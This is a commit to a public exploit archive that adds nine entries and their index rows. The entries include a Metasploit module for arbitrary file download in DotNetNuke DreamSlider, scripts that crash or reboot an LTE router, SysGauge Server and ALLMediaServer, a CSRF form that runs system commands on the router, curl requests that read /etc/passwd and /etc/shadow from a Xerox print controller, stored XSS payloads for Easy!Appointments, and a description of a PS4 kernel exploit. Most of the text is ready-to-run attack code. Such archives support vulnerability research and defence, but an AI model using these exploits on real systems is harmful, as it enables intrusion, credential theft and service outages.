DB: 2017-12-28

9 changes to exploits/shellcodes Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service SysGauge Server 3.6.18 - Denial of Service ALLMediaServer 0.95 - Buffer Overflow Sony Playstation 4 4.05 FW - Local Kernel Loader Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure Easy!Appointments 1.2.1 - Cross-Site Scripting Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download
2017-12-28 05:02:19 +00:00 · 2017-12-28 05:02:19 +00:00 · 267f841bd8
commit 267f841bd8
parent b91055c9da
10 changed files with 681 additions and 0 deletions
--- a/exploits/aspx/webapps/43405.rb
+++ b/exploits/aspx/webapps/43405.rb
@ -0,0 +1,131 @@
 # Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
 # Date: 23/01/2014
 # Author: Glafkos Charalambous
 # Version: 01.01.02
 # Vendor: DreamSlider
 # Vendor URL: http://www.dreamslider.com/
 # Google Dork: inurl:/DesktopModules/DreamSlider/
 # CVE: 
 #
 # Description
 # DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
 #
 # Vulnerable Code
 #
 # namespace DotNetNuke.Modules.DreamSlider
 # {
 #    using System;
 #    using System.IO;
 #    using System.Web.SessionState;
 #    using System.Web.UI;
 #
 #    public class DownloadProvider : Page, IRequiresSessionState
 #    {
 #        protected void Page_Load(object sender, EventArgs e)
 #        {
 #            if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
 #            {
 #                string path = base.Request.QueryString["File"];
 #                string fileName = Path.GetFileName(path);
 #                base.Response.ContentType = "application/octet-stream";
 #                base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
 #                base.Response.WriteFile(path);
 #                base.Response.End();
 #            }
 #        }
 #    }
 # }
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'DotNetNuke DreamSlider Arbitrary File Download',
      'Description'    => %q{
        This module exploits an unauthenticated arbitrary file download vulnerability in DNN
 	DreamSlider version 01.01.02 and below.
      },
      'Author'         =>
        [
          'Glafkos Charalambous', # Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'DisclosureDate' => 'Mar 23 2015'))
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
        OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
      ], self.class)
  end
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
        'cookie' => datastore['Cookie'],
      })
    if res && res.code == 200 and res.body.to_s =~ /Download Provider/
       return Exploit::CheckCode::Vulnerable
    else
       return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Safe
   end
  end
  def run
    begin
      print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
 	'cookie' => datastore['Cookie'],
      })
    rescue Rex::ConnectionError
      print_error("#{peer} - Could not connect.")
      return
    end
    if res && res.code == 200
      if res.body.to_s.bytesize == 0
        print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
        return
      end
      fileName = datastore['FILENAME']
      path = store_loot(
        'ds.http',
        'application/octet-stream',
        datastore['RHOST'],
        res.body,
        fileName
      )
      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Failed to download file.")
    end
  end
 end
--- a/exploits/bsd/local/43397.md
+++ b/exploits/bsd/local/43397.md
@ -0,0 +1,32 @@
 # PS4 4.05 Kernel Exploit
 ---
 ## Summary
 In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
 You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days).
 ## Patches Included
 The following patches are made by default in the kernel ROP chain:
 1) Disable kernel write protection
 2) Allow RWX (read-write-execute) memory mapping
 3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
 4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
 5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
 ## Notes
 - This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel.
 - I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads.
 - A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
 - An SDK is not provided in this release, however a barebones one to get started with may be released at a later date.
 - I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox.
 ## Contributors
 I was not alone in this exploit's development, and would like to thank those who helped me along the way below.
 - [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
 - [Flatz](https://twitter.com/flat_z)
 - [CTurt](https://twitter.com/CTurtE)
 - Anonymous
 E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip
--- a/exploits/hardware/dos/43401.py
+++ b/exploits/hardware/dos/43401.py
@ -0,0 +1,62 @@
 #!/usr/bin/env python
 #
 #
 # Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service
 #
 #
 # Vendor: Telesquare Co., Ltd.
 # Product web page: http://www.telesquare.co.kr
 # Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
 #                   LteVer: ML300S5XEA41_090  1 0.1.0
 #                   Modem model: PM-L300S
 #
 # Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
 # LTE wireless communication based LTE router product.
 #
 # Desc: The router suffers from an unauthenticated reboot command execution.
 # Attackers can exploit this issue to cause a denial of service scenario.
 #
 # --------------------------------------------------------------------
 # /lte/lteuicc.shtml:
 # -------------------
 #
 # 858: function RebootRequest()
 # 859: {
 # 860:     var url = "../cgi-bin/lte.cgi?";
 # 861:     var param = "Command=Reboot";
 # 862:     XHRPost(RebootHandle, url, param, false ); //sync call
 # 863: }
 # 
 # --------------------------------------------------------------------
 #
 # Tested on: lighttpd/1.4.20
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2017-5444
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5444.php
 #
 #
 # 22.12.2017
 #
 import sys, requests
 if len(sys.argv) < 2:
 	print 'SKT LTE Router SDT-CS3B1 Remote Reboot'
 	print 'Usage: b00t.py <ip> <port>\n'
 	quit()
 ip = sys.argv[1]
 port = sys.argv[2]
 r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")
 # shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
 #print r.content  #if in r.content: <xml></xml>, reboot true.
 print "Router rebooted."
--- a/exploits/hardware/webapps/43400.html
+++ b/exploits/hardware/webapps/43400.html
@ -0,0 +1,55 @@
 Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution
 Vendor: Telesquare Co., Ltd.
 Product web page: http://www.telesquare.co.kr
 Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
                  LteVer: ML300S5XEA41_090  1 0.1.0
                  Modem model: PM-L300S
 Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
 LTE wireless communication based LTE router product.
 Desc: The router suffers from authenticated arbitrary system command
 execution. The application interface allows users to perform certain
 actions via HTTP requests without performing any validity checks to
 verify the requests. This can be exploited to perform certain actions
 with administrative privileges if a logged-in user visits a malicious
 web site.
 Tested on: lighttpd/1.4.20
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5443
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5443.php
 22.12.2017
 --
 IDOR for system command interface:
 ----------------------------------
 GET /admin/system_command.shtml HTTP/1.1
 PoC GET CSRF request:
 ---------------------
 <html>
  <body>
    <form action="http://10.0.0.17:8081/cgi-bin/admin.cgi">
      <input type="hidden" name="Command" value="sysCommand" />
      <input type="hidden" name="Cmd" value="uname%20-a" />
      <input type="hidden" name="T" value="8168008531337" />
      <input type="submit" value="Send" />
    </form>
  </body>
 </html>
--- a/exploits/hardware/webapps/43402.txt
+++ b/exploits/hardware/webapps/43402.txt
@ -0,0 +1,53 @@
 Telesquare SKT LTE Router SDT-CS3B1 Insecure Direct Object Reference Info Leak
 Vendor: Telesquare Co., Ltd.
 Product web page: http://www.telesquare.co.kr
 Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
                  LteVer: ML300S5XEA41_090  1 0.1.0
                  Modem model: PM-L300S
 Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
 LTE wireless communication based LTE router product.
 Desc: Insecure direct object references occur when an application
 provides direct access to objects based on user-supplied input. As
 a result of this vulnerability attackers can bypass authorization
 and access resources and functionalities in the system.
 Tested on: lighttpd/1.4.20
 Linux mips
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5445
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php
 22.12.2017
 --
 /home.html                                  <<  Version and status info leak (firmware, device, type, modem, lte)
 /index.html                                 <<  Version and status info leak (firmware, device, type, modem, lte)
 /nas/smbsrv.shtml                           <<  Samba server settings (workgroup, netbios name)
 /nas/ftpsrv.shtml                           <<  FTP settings
 /wifi2g/basic.shtml                         <<  Wireless settings
 /admin/status.shtml                         <<  Access point status info leak
 /internet/wan.shtml                         <<  WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns)
 /internet/lan.shtml                         <<  LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns)
 /admin/statistic.shtml                      <<  System statistics info leak
 /admin/management.shtml                     <<  System management (account settings, ntp settings, ddns settings)
 /serial/serial_direct.shtml                 <<  Direct serial settings (network connection settings, serverip, port)
 /admin/system_command.shtml                 <<  System command interface
 /internet/dhcpcliinfo.shtml                 <<  DHCP Clients info leak (hostname, macaddr, ipaddr)
 /admin/upload_firmware.shtml                <<  Router firmware and lte firmware upgrade
 /firewall/vpn_futuresystem.shtml            <<  VPN settings (udp packet transfer, icmp check)
 /cgi-bin/lte.cgi?Command=getUiccState       <<  GetUiccState()
 /cgi-bin/lte.cgi?Command=getModemStatus     <<  Modem status info leak
 /cgi-bin/systemutil.cgi?Command=SystemInfo  <<  System info leak
--- a/exploits/php/webapps/43398.txt
+++ b/exploits/php/webapps/43398.txt
@ -0,0 +1,142 @@
 Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
 Vendor: Electronics for Imaging, Inc.
 Product web page: http://www.efi.com
 Affected version: EFI Fiery Controller SW2.0
                  Xerox DocuColor 260, 250, 242
 Summary: Drive production profitability with Fiery servers and workflow
 products. See which Fiery digital front end is right for your current
 or future print engines and business needs. Manage all your printers
 from a single screen using this intuitive print job management interface.
 Desc: Input passed thru the 'file' GET parameter in 'forceSave.php'
 script is not properly sanitized before being used to read files. This
 can be exploited by an unauthenticated attacker to read arbitrary files
 on the affected system.
 ======================================================================
 /wt3/js/save.js:
 ----------------
 103: function parseSaveMessages() {
 104:     var urlNode = saveDocument.getElementsByTagName('url').item(0);
 105:     var url = urlNode.firstChild.data;
 106:     var forcedSaveUrl = "forceSave.php?file=" + url;
 107:     window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');
 ====
 /wt3/forceSave.php:
 -------------------
 1. <?php
 2. //code posted by chrisputnam at gmail dot com
 3. function readfile_chunked($filename,$retbytes=true)
 4. {
 5.     $chunksize = 1*(1024*1024); // how many bytes per chunk
 6.     $buffer = '';
 7.     $cnt =0;
 8.     // $handle = fopen($filename, 'rb');
 9.     $handle = fopen($filename, 'rb');
 10.     if ($handle === false)
 11.     {
 12.          return false;
 13.     }
 14.     while (!feof($handle))
 15.     {
 16.          //read a chunk
 17.          $buffer = fread($handle, $chunksize);
 18.          //send the chunk
 19.          echo $buffer;
 20.          //flush the chunk
 21.          flush();
 22.          //increment the size read/sent
 23.          if ($retbytes)
 24.          {
 25.            $cnt += strlen($buffer);
 26.          }
 27.     }
 28.     //close file
 29.     $status = fclose($handle);
 30.     if ($retbytes && $status)
 31.     {
 32.          return $cnt; // return num. bytes delivered like readfile() does.
 33.     }
 34.     return $status;
 35. }
 36.
 37. $filename = $_GET['file'];
 38. if(!$filename)
 39. { 
 40.     echo "ERROR: No filename specified. Please try again."; 
 41. }
 42. else
 43. {
 44.     // fix for IE caching or PHP bug issue
 45.     header("Pragma: public");
 46.     header("Expires: 0"); // set expiration time
 47.     header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
 48.     // browser must download file from server instead of cache
 49.
 50.     // force download dialog
 51.     header("Content-Type: application/force-download");
 52.     header("Content-Type: application/octet-stream");
 53.     header("Content-Type: application/download");
 54.
 55.     // use the Content-Disposition header to supply a recommended filename and
 56.     // force the browser to display the save dialog.
 57.     header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
 58.     header("Content-Transfer-Encoding: binary");
 59.
 60.     header("Content-Length: " . filesize($filename));
 61.
 62.     set_time_limit(0);
 63.     readfile_chunked($filename, false);
 64.
 65.     exit();
 66. }
 67.
 68. ?> 
 ======================================================================
 Tested on: Debian GNU/Linux 3.1
           Apache
           PHP/5.4.41
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5447
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
 20.12.2017
 --
 # curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:100:sync:/bin:/bin/sync
 games:x:5:100:games:/usr/games:/bin/sh
 ...
 ...
 # curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
 root:LUUVeT6GbOy9I:10978:0:99999:7:::
 daemon:*:10979:0:99999:7:::
 bin:*:10979:0:99999:7:::
 sys:*:10979:0:99999:7:::
 sync:*:10979:0:99999:7:::
 games:*:10979:0:99999:7:::
 ...
 ...
--- a/exploits/php/webapps/43399.txt
+++ b/exploits/php/webapps/43399.txt
@ -0,0 +1,112 @@
 Easy!Appointments v1.2.1 Multiple Stored XSS Vulnerabilities
 Vendor: Alex Tselegidis
 Product web page: http://www.easyappointments.org
 Affected version: 1.2.1
 Summary: Easy!Appointments is a highly customizable web application
 that allows your customers to book appointments with you via the web.
 Moreover, it provides the ability to sync your data with Google Calendar
 so you can use them with other services. It is an open source project
 and you can download and install it even for commercial use. Easy!Appointments
 will run smoothly with your existing website, because it can be installed
 in a single folder of the server and of course, both sites can share
 the same database. Learn more about the project in the Features page.
 Desc: The application suffers from multiple stored and reflected XSS
 vulnerabilities. The issues are triggered when an unauthorized input
 passed via multiple POST and GET parameters is not properly sanitized
 before being returned to the user. This can be exploited to execute
 arbitrary HTML and script code in a user's browser session in context
 of an affected site.
 Tested on: Apache/2.4.23 (Win32)
           OpenSSL/1.0.2h
           MariaDB-10.1.19
           PHP/5.6.28
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5442
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5442.php
 20.10.2017
 --
 PoC:
 {"name":"XSS1","description":"Description"}
 <html>
  <body>
    <form action="http://10.211.55.3/easyappointments121/index.php/backend_api/ajax_save_service_category" method="POST">
      <input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
      <input type="hidden" name="category" value="&#123;"name"&#58;"XSS1"&#44;"description"&#58;"Description"&#125;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 ---
 <html>
  <body>
    <form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
      <input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
      <input type="hidden" name="service&#95;id" value='"><script>alert(2)</script>' />
      <input type="hidden" name="provider&#95;id" value="85" />
      <input type="hidden" name="selected&#95;date" value="2017&#45;11&#45;30" />
      <input type="hidden" name="service&#95;duration" value="30" />
      <input type="hidden" name="manage&#95;mode" value="false" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 ---
 <html>
  <body>
    <form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
      <input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
      <input type="hidden" name="service&#95;id" value="13" />
      <input type="hidden" name="provider&#95;id" value="85" />
      <input type="hidden" name="selected&#95;date" value="<marquee>" />
      <input type="hidden" name="service&#95;duration" value="30" />
      <input type="hidden" name="manage&#95;mode" value="false" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 ---
 <html>
  <body>
    <form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_register_appointment" method="POST">
      <input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
      <input type="hidden" name="post&#95;data&#91;customer&#93;&#91;last&#95;name&#93;" value="sdadsd" />
      <input type="hidden" name="post&#95;data&#91;customer&#93;&#91;first&#95;name&#93;" value="asdasd" />
      <input type="hidden" name="post&#95;data&#91;customer&#93;&#91;email&#93;" value="asdasd&#64;bbb&#46;dd" />
      <input type="hidden" name="post&#95;data&#91;customer&#93;&#91;phone&#95;number&#93;" value="1112223333" />
      <input type="hidden" name="post&#95;data&#91;customer&#93;&#91;address&#93;" value="" />
      <input type="hidden" name="post&#95;data&#91;customer&#93;&#91;city&#93;" value="" />
      <input type="hidden" name="post&#95;data&#91;customer&#93;&#91;zip&#95;code&#93;" value="" />
      <input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;start&#95;datetime&#93;" value=""><script>alert&#40;3&#41;<&#47;script>" />
      <input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;end&#95;datetime&#93;" value="2017&#45;11&#45;30&#32;16&#58;00&#58;00" />
      <input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;notes&#93;" value="" />
      <input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;is&#95;unavailable&#93;" value="false" />
      <input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;id&#95;users&#95;provider&#93;" value="85" />
      <input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;id&#95;services&#93;" value="13" />
      <input type="hidden" name="post&#95;data&#91;manage&#95;mode&#93;" value="false" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
--- a/exploits/windows/dos/43403.py
+++ b/exploits/windows/dos/43403.py
@ -0,0 +1,41 @@
 # Exploit Title: SysGauge Server 3.6.18 - DOS
 # Date: 2017-10-20
 # Exploit Author: Ahmad Mahfouz
 # Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe
 # Version: v3.6.18
 # Category; Windows Remote DOS
 # CVE: CVE-2017-15667
 # Author Homepage: www.unixawy.com
 # Description: SysGauge Server 3.6.18 the Control Protocl suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9221.
 #!/usr/bin/env python
 import socket
 target = "192.168.72.133"
 port = 9221
 s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 s.connect((target,port))
 packet = "\x75\x19\xba\xab\x03"
 packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
 packet += "\x00"
 packet += "\x3e"
 packet += "\x00"
 packet += "\x20"
 packet += "\x00"
 packet += "\x00"
 packet += "\x00"
 packet += "\x00\x00\x00\x00"
 packet += "SERVER_GET_INFO"
 packet += "\x02\x32\x01"
 packet += "Data"
 packet += "\x01\x30\x01\x00"
 packet += "\x04\x02\x74"
 packet += "\x18\x18\x00"
 s.send(packet)
 try:
          data = s.recv(100)
 except:
          print "K1LL3D"
--- a/exploits/windows/dos/43406.py
+++ b/exploits/windows/dos/43406.py
@ -0,0 +1,44 @@
 # Exploit Title: Buffer  overflow in ALLPlayer ALLMediaServer 0.95 and earlier
 # CVE: CVE-2017-17932
 # Date: 27-12-2017 
 # Exploit Author: Aloyce J. Makalanga
 # Contact: https://twitter.com/aloycemjr
 # Vendor Homepage: http://www.allmediaserver.org/
 # Category: webapps
 # Attack Type: Remote
 # Impact: Code execution and/or Denial of Service 
 1. Description
 A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
 2. Proof of Concept
 #!/usr/bin/python
 #NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work. 
 def main():
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect(('192.168.205.131', 888))
   buffer = "A" * 3000
   s.send(buffer)
   s.close()
 if __name__ == '__main__':
   import socket
   main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5433,6 +5433,9 @@ id,file,description,date,author,type,platform,port
 43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
 43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
 43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
 43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware,
 43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,
 43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow",2017-12-27,"Aloyce J. Makalanga",dos,windows,
 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9235,6 +9238,7 @@ id,file,description,date,author,type,platform,port
 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
 43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -37669,6 +37673,11 @@ id,file,description,date,author,type,platform,port
 43394,exploits/php/webapps/43394.txt,"Biometric Shift Employee Management System 3.0 - Local File Disclosure",2017-12-26,"Ihsan Sencan",webapps,php,
 43395,exploits/php/webapps/43395.php,"Sendroid < 6.5.0 - SQL Injection",2017-12-26,"Onwuka Gideon",webapps,php,
 43396,exploits/php/webapps/43396.txt,"SilverStripe CMS 3.6.2 - CSV Excel Macro Injection",2017-12-26,"Ishaq Mohammed",webapps,php,
 43398,exploits/php/webapps/43398.txt,"Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure",2017-12-27,LiquidWorm,webapps,php,
 43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php,
 43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
 43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
 43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download",2017-12-27,"Glafkos Charalambous",webapps,aspx,
 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,